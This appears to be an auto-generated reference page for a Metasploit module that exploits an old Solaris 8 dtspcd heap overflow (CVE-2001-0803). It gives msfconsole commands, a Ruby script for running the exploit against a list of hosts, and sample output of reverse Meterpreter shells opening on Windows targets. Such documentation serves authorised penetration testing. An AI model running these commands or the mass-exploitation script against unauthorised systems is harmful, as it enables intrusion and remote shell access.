Solaris dtspcd Heap Overflow - Metasploit


This page contains detailed information about how to use the exploit/solaris/dtspcd/heap_noir metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Solaris dtspcd Heap Overflow
Module: exploit/solaris/dtspcd/heap_noir
Source code: modules/exploits/solaris/dtspcd/heap_noir.rb
Disclosure date: 2002-07-10
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): sparc
Supported platform(s): Solaris
Target service / protocol: -
Target network port(s): 6112
List of CVEs: CVE-2001-0803

This is a port of noir's dtspcd exploit. This module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using heap_noir against a single host

Normally, you can use exploit/solaris/dtspcd/heap_noir this way:

msf > use exploit/solaris/dtspcd/heap_noir
msf exploit(heap_noir) > show targets
    ... a list of targets ...
msf exploit(heap_noir) > set TARGET target-id
msf exploit(heap_noir) > show options
    ... show and set options ...
msf exploit(heap_noir) > exploit

Using heap_noir against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your heap_noir will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/solaris/dtspcd/heap_noir")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the solaris/dtspcd/heap_noir exploit module looks in the msfconsole:

msf6 > use exploit/solaris/dtspcd/heap_noir

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(solaris/dtspcd/heap_noir) > show info

       Name: Solaris dtspcd Heap Overflow
     Module: exploit/solaris/dtspcd/heap_noir
   Platform: Solaris
       Arch: sparc
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2002-07-10

Provided by:
  noir <[email protected]>
  hdm <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Solaris 8

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   6112             yes       The target port (TCP)

Payload information:
  Space: 800
  Avoid: 2 characters

Description:
  This is a port of noir's dtspcd exploit. This module should work 
  against any vulnerable version of Solaris 8 (sparc). The original 
  exploit code was published in the book Shellcoder's Handbook.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2001-0803
  OSVDB (4503)
  http://www.securityfocus.com/bid/3517
  http://www.cert.org/advisories/CA-2001-31.html
  http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip

Module Options


This is a complete list of options available in the solaris/dtspcd/heap_noir exploit:

msf6 exploit(solaris/dtspcd/heap_noir) > show options

Module options (exploit/solaris/dtspcd/heap_noir):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6112             yes       The target port (TCP)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Solaris 8

Advanced Options


Here is a complete list of advanced options supported by the solaris/dtspcd/heap_noir exploit:

msf6 exploit(solaris/dtspcd/heap_noir) > show advanced

Module advanced options (exploit/solaris/dtspcd/heap_noir):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the solaris/dtspcd/heap_noir module can exploit:

msf6 exploit(solaris/dtspcd/heap_noir) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Solaris 8

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the solaris/dtspcd/heap_noir exploit:

msf6 exploit(solaris/dtspcd/heap_noir) > show payloads

Compatible Payloads
===================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  payload/generic/custom                                    normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/solaris/sparc/shell_bind_tcp                      normal  No     Solaris Command Shell, Bind TCP Inline
   4  payload/solaris/sparc/shell_reverse_tcp                   normal  No     Solaris Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the solaris/dtspcd/heap_noir exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(solaris/dtspcd/heap_noir) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • noir <noir[at]uberhax0r.net>
  • hdm

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.